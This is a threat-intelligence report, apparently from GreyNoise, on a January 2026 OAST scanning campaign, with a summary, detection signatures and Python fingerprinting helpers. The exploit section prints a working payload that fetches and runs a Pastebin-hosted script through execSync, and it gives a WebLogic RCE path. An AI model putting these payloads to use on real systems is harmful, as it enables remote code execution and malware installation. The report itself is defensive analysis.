# Full Report
## Overview

Between January 24 and January 31, 2026, the GreyNoise Global Observation Grid cataloged 6,752 scanning sessions from 58 unique IP addresses embedding 5,531 distinct Out-of-band Application Security Testing (OAST) callback domains across 48 identified campaigns. The activity represents coordinated vulnerability reconnaissance targeting enterprise applications, IoT devices, and cloud infrastructure.

Key Indicators:

- 5,531 OAST domains decoded from 28 unique machine identifiers
- Anomalous TCP fingerprints (MSS 65495) observed in 11.8% of traffic
- Multiple high-severity CVE exploits including WebLogic RCE, Java deserialization, and React prototype pollution
- Sustained campaign activity spanning 3.6 weeks (earliest OAST timestamp: 2026-01-05)

## Infrastructure Analysis

### Network Distribution

| ASN | Organization | Countries | Session Count | % of Total |
|---|---|---|---|---|
| AS14956 | RouterHosting LLC | Germany | 2,344 | 34.7% |
| AS24806 | INTERNET CZ, a.s. | Czech Republic | 1,824 | 27.0% |
| AS31898 | Oracle Corporation | Canada, South Korea | 1,400 | 20.7% |
| AS14061 | DigitalOcean | Singapore | 326 | 4.8% |
| AS210538 | KEYUBU Internet | Turkey | 656 | 9.7% |
| Other | Various | 22 countries | 202 | 3.0% |

### JA4 Fingerprint Analysis

Three primary fingerprint families identified:

1. Standard Linux Scanner (79.5% of traffic)
   - JA4T: 64240_2-4-8-1-3_1460_7
   - Window Size: 64240
   - MSS: 1460 (standard)
   - Sessions: 5,372
   - Assessment: Consistent with modified Linux scanning tools or frameworks
2. Anomalous Scanner Type A (8.2% of traffic)
   - JA4T: 33280_2-4-8-1-3_65495_7
   - Window Size: 33280
   - MSS: 65495 (ANOMALOUS)
   - Sessions: 556
   - Assessment: Custom network stack - MSS value 65495 not found in legitimate software
3. Anomalous Scanner Type B (3.6% of traffic)
   - JA4T: 65495_2-4-8-1-3_65495_7
   - Window Size: 65495
   - MSS: 65495 (ANOMALOUS)
   - Sessions: 245
   - Assessment: Highly distinctive custom stack configuration

Significance: MSS value 65495 is a strong fingerprint for purpose-built scanning infrastructure. This value approaches the theoretical TCP MSS maximum (65535) and is never used by standard operating systems or network stacks.

### Top Source IPs

| IP Address | Country | ASN | Sessions | First Seen | Last Seen |
|---|---|---|---|---|---|
| 172.86.66.237 | Germany | AS14956 | 2,344 | 2026-01-27 | 2026-01-31 |
| 194.182.90.104 | Czech Republic | AS24806 | 1,824 | 2026-01-25 | 2026-01-31 |
| 40.233.66.153 | Canada | AS31898 | 789 | 2026-01-27 | 2026-01-29 |
| 168.107.59.85 | South Korea | AS31898 | 611 | 2026-01-24 | 2026-01-30 |
| 31.57.77.235 | Turkey | AS210538 | 575 | 2026-01-28 | 2026-01-30 |

## OAST Campaign Analysis

Decoded 5,531 OAST domains revealing 48 distinct campaigns across 28 unique machine IDs.

### Top 5 Campaigns by Volume

#### Campaign: dftn9

- OAST Domains: 2,044 (36.9%)
- Machine ID: af:ed:d2
- PIDs: 45287, 6518
- Duration: January 27-29, 2026 (1.7 days)
- K-Sort Values: d5sf0j, d5tidb
- Assessment: Largest campaign by domain count - intensive burst scanning

#### Campaign: vn6u3

- OAST Domains: 892 (16.1%)
- Machine ID: f7:37:86
- PIDs: 54381, 42767, 35027, 42599
- Duration: January 27-30, 2026 (3.3 days)
- K-Sort Values: d5seuo, d5t1qc, d5ug5j, d5ul4a
- Assessment: Sustained scanning with multiple process restarts

#### Campaign: gffll

- OAST Domains: 465 (8.4%)
- Machine ID: 0f:7d:6a
- PIDs: 34674, 57772
- Duration: January 27-29, 2026 (1.5 days)
- Assessment: Coordinated with the dftn9 campaign - similar temporal window

#### Campaign: 49ndh

- OAST Domains: 293 (5.3%)
- Machine ID: 89:bb:62
- PIDs: 53182, 55486
- Duration: January 25-30, 2026 (5.0 days)
- Assessment: Longest-running campaign with steady activity

#### Campaign: s9ndh

- OAST Domains: 8 (0.1%)
- Machine ID: 89:bb:62
- First Seen: January 24, 2026
- Assessment: Early reconnaissance phase from the same machine as the 49ndh campaign

OAST Infrastructure: Domains primarily used the .oast.fun, .oast.live, .oast.me, .oast.pro, and .oast.site TLDs - all associated with the Interactsh OAST service.
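The MSS 65495 check from the JA4 Fingerprint Analysis above, as an added example that is not part of the GreyNoise report: it parses a raw TCP SYN header, renders the JA4T string in the layout the report uses (window, option kinds in order, MSS, window scale; `00` for an absent value is an assumption), and flags the anomalous MSS. `build_syn` constructs the sample SYNs with the report's 2-4-8-1-3 option order.

```python
"""JA4T-style SYN fingerprint and anomalous-MSS check (added example, not from the report).
Assumed layout, as in the report: <window>_<option kinds>_<MSS>_<window scale>, '00' when absent."""
import struct
ANOMALOUS_MSS = 65495  # flagged in the report as a marker of purpose-built scanners

def parse_tcp_header(tcp_header: bytes) -> dict:
    """Parse a raw TCP header (IP header stripped) into window size, option kinds, MSS and window scale."""
    if len(tcp_header) < 20:
        raise ValueError("TCP header too short")
    off_flags, window = struct.unpack("!HH", tcp_header[12:16])  # data offset/flags, window
    data_offset = (off_flags >> 12) * 4
    if data_offset < 20 or data_offset > len(tcp_header):
        raise ValueError("invalid data offset")
    opts, kinds, mss, wscale, i = tcp_header[20:data_offset], [], None, None, 0
    while i < len(opts):
        kind = opts[i]
        kinds.append(kind)
        if kind == 0:  # End of Option List
            break
        if kind == 1:  # NOP carries no length byte
            i += 1
            continue
        length = opts[i + 1] if i + 1 < len(opts) else 0
        if length < 2 or i + length > len(opts):
            raise ValueError("malformed TCP option")
        if kind == 2 and length == 4:  # Maximum Segment Size
            mss = struct.unpack("!H", opts[i + 2:i + 4])[0]
        elif kind == 3 and length == 3:  # Window Scale
            wscale = opts[i + 2]
        i += length
    return {"window": window, "kinds": kinds, "mss": mss, "wscale": wscale}

def ja4t(parsed: dict) -> str:
    """Render the parsed SYN as a JA4T string such as 33280_2-4-8-1-3_65495_7."""
    kinds = "-".join(str(k) for k in parsed["kinds"]) or "00"
    mss = "00" if parsed["mss"] is None else parsed["mss"]
    wscale = "00" if parsed["wscale"] is None else parsed["wscale"]
    return f"{parsed['window']}_{kinds}_{mss}_{wscale}"

def classify(tcp_header: bytes) -> tuple:
    """Return (JA4T string, True if the SYN advertises the anomalous MSS 65495)."""
    parsed = parse_tcp_header(tcp_header)
    return ja4t(parsed), parsed["mss"] == ANOMALOUS_MSS

def build_syn(window: int, mss: int, wscale: int) -> bytes:
    """Construct a sample SYN with options MSS, SACK-OK, Timestamps, NOP, WScale (the report's 2-4-8-1-3 order)."""
    opts = (struct.pack("!BBH", 2, 4, mss) + bytes([4, 2]) + struct.pack("!BBII", 8, 10, 0, 0)
            + bytes([1]) + bytes([3, 3, wscale]))
    data_offset = (20 + len(opts)) // 4
    return struct.pack("!HHIIHHHH", 40000, 80, 1, 0, (data_offset << 12) | 0x02, window, 0, 0) + opts
```

`classify(build_syn(33280, 65495, 7))` returns `('33280_2-4-8-1-3_65495_7', True)`, the Type A fingerprint from the report.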
## Exploit Analysis

### CVEs Actively Exploited

#### CVE-2020-14882 / CVE-2020-14883 (Oracle WebLogic RCE)

- Occurrences: 23+ payloads
- Path: `/_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession`
- Payload Type: Java deserialization leading to RCE
- Severity: Critical (CVSS 9.8)

#### React Prototype Pollution with Malware Loader

- Occurrences: 17+ variants
- Malware Staging: https://pastebin.com/raw/9GEqrAq5
- Execution Methods: setsid, nohup, dos2unix - designed for persistence
- Payload Pattern:

```javascript
process.mainModule.require('child_process').execSync(
  'cd /tmp;wget -O run.sh https://pastebin.com/raw/9GEqrAq5; chmod +x run.sh;setsid sh run.sh /dev/null > /dev/null 2>&1 &'
)
```

#### Java Deserialization Attacks

- Frameworks Targeted:
  - Apache Commons (PriorityQueue deserialization)
  - JNDI injection via JdbcRowSetImpl
  - Apache Spark RCE (CVE-2018-11770)
- Occurrences: Multiple variants across 6+ payload families

#### XML External Entity (XXE) Injection

- Occurrences: 8+ payloads
- Technique:
- Target: XML parsers in enterprise applications

#### IoT/Network Device Command Injection

- Targets: TP-Link, D-Link, GPON ONT devices
- Commands: wget, curl, nslookup with OAST callbacks
- Assessment: Opportunistic targeting of known IoT vulnerabilities

### Targeted Applications/Services

- Oracle WebLogic Server
- WordPress (multiple plugins)
- Grafana
- pfBlockerNg
- Apache Spark
- Seeyon OA
- Various GPON/ONT firmware
- ColdFusion (Adobe)

## Temporal Analysis

### Session Volume by Day

| Date | Sessions | Unique IPs | Peak Hour | Burst Detected |
|---|---|---|---|---|
| 2026-01-24 | 73 | 8 | 12:00 UTC | No |
| 2026-01-25 | 361 | 9 | 19:00 UTC | Yes (282 sessions) |
| 2026-01-26 | 459 | 18 | 04:00 UTC | Yes (273 sessions) |
| 2026-01-27 | 1,629 | 19 | 17:00 UTC | Yes (492 sessions) |
| 2026-01-28 | 1,240 | 11 | 05:00 UTC | Yes (372 sessions) |
| 2026-01-29 | 840 | 7 | 13:00 UTC | Yes (210 sessions) |
| 2026-01-30 | 1,552 | 21 | 19:00 UTC | Yes (406 sessions) |
| 2026-01-31 | 598 | 5 | 00:00 UTC | Yes (377 sessions) |

### Burst Pattern Analysis

39 hourly bursts detected (>100% increase over the previous hour):

- Peak burst: 2026-01-30 19:00 UTC - 406 sessions (from 2 in the previous hour)
- Consistent evening UTC bursts (17:00-21:00)
- Suggests automated scanning orchestration with scheduled execution

## Historical Context & Campaign Lifecycle

### Pre-Dating Evidence

OAST timestamp analysis reveals activity pre-dating the sensor observation window:

- Earliest OAST domain: January 5, 2026 (Campaign: 972vm)
- Earliest sensor session: January 24, 2026
- Gap: 19 days of prior activity

Assessment: The scanning infrastructure was operational for nearly 3 weeks before hitting GreyNoise sensors. This suggests:

1. Established infrastructure - not a new/test campaign
2. Broader target scope - GreyNoise sensors represent a subset of the total targets
3. Ongoing operations - campaigns likely continuing beyond the observation window

### Campaign Coordination Indicators

Evidence of coordinated operations:

1. Shared OAST infrastructure - all campaigns use the same Interactsh service
2. Overlapping temporal windows - major campaigns (dftn9, vn6u3, gffll) active Jan 27-29
3. Common exploit payloads - same CVEs targeted across multiple source IPs
4. Fingerprint diversity - deliberate use of multiple TCP stack configurations

## Attribution & Threat Actor Assessment

Confidence: Medium

Indicators:

- Professional OAST usage - 48 campaigns with unique machine IDs suggests organized tooling
- Exploit diversity - targets enterprise (WebLogic, Spark) and IoT infrastructure
- Custom fingerprints - MSS 65495 indicates purpose-built scanning tools
- No attribution artifacts - no clear C2 domains; staging servers use Pastebin

### Likely Actor Profile

Opportunistic vulnerability research collective or bug bounty operation:

- Not APT/nation-state - too noisy, lacks operational security
- Possibly legitimate - OAST usage consistent with security research
- Commercial tooling - fingerprint diversity suggests framework usage (Nuclei, custom scanners)

Alternative assessment: Reconnaissance for follow-on exploitation by multiple threat actors sharing infrastructure.
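The hourly burst rule from the Temporal Analysis above (more than a 100% increase over the previous hour), applied to sessions carrying Interactsh callback hosts, as an added example that is not part of the GreyNoise report. The log format, the placeholder IPs and hosts, and the handling of empty hours are assumptions made for the example.

```python
"""Hourly burst detection over OAST-callback sessions (added example, not from the report).
Assumptions: constructed log format '<ISO-8601 UTC timestamp> <source IP> <callback host>'; a burst is an
hour with more than double the previous hour's sessions (the report's '>100% increase'); the first hour is
never a burst; a nonzero hour following an empty hour is."""
from collections import Counter
from datetime import datetime, timedelta, timezone
# Interactsh TLDs named in the report
OAST_SUFFIXES = (".oast.fun", ".oast.live", ".oast.me", ".oast.pro", ".oast.site")
# Constructed sample sessions: placeholder IPs and hosts, not indicators from the report
SAMPLE_LOG = """\
2026-01-30T17:12:03Z 198.51.100.10 probe01.oast.fun
2026-01-30T17:41:55Z 198.51.100.10 probe02.oast.live
2026-01-30T18:07:19Z 198.51.100.11 probe03.oast.me
2026-01-30T18:30:00Z 198.51.100.11 www.example.com
2026-01-30T19:00:02Z 198.51.100.12 probe04.oast.pro
2026-01-30T19:01:09Z 198.51.100.12 probe05.oast.site
2026-01-30T19:02:44Z 198.51.100.12 probe06.oast.fun
2026-01-30T19:03:51Z 198.51.100.13 probe07.oast.fun
2026-01-30T20:15:00Z 198.51.100.14 probe08.oast.pro
"""

def is_oast_host(host: str) -> bool:
    """True when the host sits under one of the Interactsh TLDs (the report's '.oast.' pattern)."""
    return host.lower().endswith(OAST_SUFFIXES)

def hourly_oast_counts(log: str) -> dict:
    """Count OAST-callback sessions per UTC hour, skipping non-OAST and malformed lines."""
    counts = Counter()
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 3 or not is_oast_host(parts[2]):
            continue
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        counts[ts.replace(minute=0, second=0)] += 1
    return dict(counts)

def detect_bursts(counts: dict) -> list:
    """Return (hour, sessions, previous) for hours with a >100% increase, over a contiguous hour range."""
    if not counts:
        return []
    hour, end = min(counts), max(counts)
    bursts, prev = [], counts.get(hour, 0)
    while hour < end:
        hour += timedelta(hours=1)
        cur = counts.get(hour, 0)  # hours with no sessions count as 0
        if cur > 2 * prev and cur > 0:
            bursts.append((hour.strftime("%Y-%m-%d %H:00 UTC"), cur, prev))
        prev = cur
    return bursts
```

On the sample log the only burst is 19:00 UTC, where 4 callback sessions follow 1 in the previous hour.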
## Recommendations

### Immediate Actions

- Block source IPs - all 58 IPs confirmed as scanning infrastructure
- Monitor OAST callbacks - alert on connections to .oast.* domains
- Patch CVEs - prioritize:
  - CVE-2020-14882/14883 (WebLogic)
  - Java deserialization vectors
  - IoT device firmware updates

### Detection Engineering

Network Signatures:

```
# Anomalous MSS detection (the MSS option is only carried in SYN/SYN-ACK segments)
alert tcp any any -> any any (msg:"Anomalous MSS 65495 - Custom Scanner"; \
    tcp.mss:65495; sid:1000001;)

# OAST domain pattern
alert dns any any -> any 53 (msg:"Interactsh OAST Callback"; \
    dns.query; content:".oast."; sid:1000002;)
```

YARA for the malware staging URL:

```yara
rule Pastebin_9GEqrAq5_Malware_Loader {
    strings:
        $url = "pastebin.com/raw/9GEqrAq5"
        $wget = "wget -O run.sh"
    condition:
        any of them
}
```

### Long-term Monitoring

- Track machine ID evolution - monitor for reuse of MAC prefixes (af:ed:d2, f7:37:86, 0f:7d:6a, 89:bb:62)
- JA4 fingerprint database - add MSS 65495 patterns to threat intel feeds
- OAST domain correlation - cross-reference k-sort values across future incidents

## Conclusion

This analysis documents a multi-week reconnaissance campaign leveraging sophisticated OAST techniques across 48 distinct sub-campaigns. While the activity is noisy and detectable, the scale (5,531 callback domains), infrastructure diversity (28 machines), and exploit breadth indicate an organized operation. The use of anomalous TCP fingerprints (MSS 65495) provides a high-confidence detection opportunity for defensive teams. Organizations should prioritize patching the identified CVEs and implementing OAST callback monitoring.
# Analysis Summary
# Attack Campaign: Coordinated OAST Vulnerability Reconnaissance
## Overview
A large-scale, coordinated vulnerability reconnaissance campaign spanning multiple weeks, detected between January 24 and January 31, 2026. The activity utilized Out-of-band Application Security Testing (OAST) methodologies via Interactsh to confirm exploitable vulnerabilities across enterprise applications, IoT devices, and cloud infrastructure. The operation featured 48 distinct sub-campaigns driven by numerous unique machine identifiers and leveraging custom network fingerprinting.
## Technical Details
- Type: Technique / Coordinated Reconnaissance
- Platform: Enterprise Applications (Java/WebLogic, Apache Spark), Web Frameworks (React), IoT Devices (TP-Link, D-Link, GPON ONT)
- Capabilities: Automated vulnerability scanning and verification using OAST callbacks.
- First Seen: Earliest OAST timestamp identified was 2026-01-05.
## MITRE ATT&CK Mapping
- TA0043 - C2 (Command and Control) - *Used in a passive sense, leveraging external service for callback validation.*
  - T1568 - Dynamic Resolution
    - T1568.002 - Domain Generation Algorithms (*Though DGA is not explicitly used, the high volume of generated subdomains acts similarly for validation timing.*)
- TA0008 - Lateral Movement (*Exploits leveraged aim for initial access leading to control.*)
  - T1189 - Drive-by Compromise (*Applicable if OAST technique is used as a passive prerequisite for exploitation.*)
- TA0001 - Initial Access
  - T1190 - Exploit Public-Facing Application
## Functionality
### Core Capabilities
- **OAST Probing:** Utilizing 5,531 distinct domains associated with the Interactsh service (`.oast.fun`, `.oast.live`, etc.) to confirm system reachability and vulnerability execution.
- **Campaign Management:** Organized into 48 sub-campaigns, tracked by 28 unique machine identifiers and associated K-Sort values (e.g., `d5sf0j`, `d5seuo`).
- **Exploit Focus:** Active testing against known high-severity CVEs.
### Advanced Features
- **Custom Network Fingerprinting:** A significant portion of traffic (11.8%) exhibited anomalous TCP fingerprints, specifically setting the Maximum Segment Size (MSS) to 65495. This indicates the use of **purpose-built scanning infrastructure** or modified tools not adhering to standard operating system stacks.
- **Persistence/Staging Indicators:** Payloads exploiting React Prototype Pollution included elements designed explicitly for persistence, such as utilizing `/tmp` execution paths with commands like `setsid`, `nohup`, and `dos2unix`.
- **Infrastructure Sharing:** Evidence suggests coordination, with multiple campaigns overlapping in time (e.g., `dftn9` and `gffll`) and sharing infrastructure components (Machine ID `89:bb:62` ran both `49ndh` and `s9ndh`).
## Indicators of Compromise
- File Hashes: N/A (Focus was on reconnaissance payloads, not final malware drops, though a specific staging URL was noted.)
- File Names: `run.sh` (Staging execution script)
- Registry Keys: N/A
- Network Indicators:
  - OAST Domains: Domains ending in `.oast.fun`, `.oast.live`, `.oast.me`, `.oast.pro`, `.oast.site` (all linked to Interactsh).
  - Malware Staging URL: `pastebin[.]com/raw/9GEqrAq5` (Defanged)
- Behavioral Indicators:
  - TCP connections initiating with anomalous MSS value of **65495**.
  - Detection of execution chains involving `setsid`, `nohup`, and `wget` targeting the Pastebin URL.
  - Specific URIs targeting WebLogic RCE: `/_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession`
## Associated Threat Actors
The profile suggests:
1. **Opportunistic Vulnerability Research Collective/Bug Bounty Operation:** Indicated by the noisy, large-scale OAST usage, which is common in security research but lacks APT operational security.
2. **Multiple Threat Actors Sharing Infrastructure:** The diversity of exploits and fingerprints could mean several actors are leveraging shared or commercial scanning infrastructure for initial reconnaissance.
The activity is explicitly assessed as **Not APT/nation-state**.
## Detection Methods
- **Network Signatures (IDS/IPS):** Alerting on traffic where `tcp.mss` equals **65495** (JA4T fingerprints 33280_2-4-8-1-3_65495_7 and 65495_2-4-8-1-3_65495_7). Alerting on DNS queries containing `.oast.` content.
- **YARA Rule (For confirmed payloads):**
  ```yara
  rule Pastebin_9GEqrAq5_Malware_Loader {
      strings:
          $url = "pastebin.com/raw/9GEqrAq5"
          $wget = "wget -O run.sh"
      condition:
          any of them
  }
  ```
- **Log Analysis:** Monitoring for connection attempts to known Oracle WebLogic/Apache Spark exploitation paths.
## Mitigation Strategies
1. **Patching:** Immediately prioritize patching CVE-2020-14882/14883 (Oracle WebLogic RCE) and applying firmware updates for targeted IoT devices (TP-Link, D-Link, GPON ONT).
2. **Application Hardening:** Review and secure endpoints vulnerable to Java deserialization and React Prototype Pollution.
3. **Network Blocking:** Block the identified 58 source IP addresses and restrict outbound DNS/HTTP access to known OAST domains if justified by policy.
## Related Tools/Techniques
- **Interactsh:** The OAST framework used for callback validation.
- **Custom Scanning Frameworks:** Implied by the custom TCP MSS 65495 fingerprint; potentially modified versions of open-source scanners like Nuclei.
- **Exploitation Techniques:** Java deserialization (e.g., MVEL injection), JNDI injection, and XXE injection are fundamental exploitation methods observed.
- **Malware Staging Techniques:** Use of standard shell commands (`setsid`, `nohup`, `wget`) for lightweight payload execution and persistence attempts.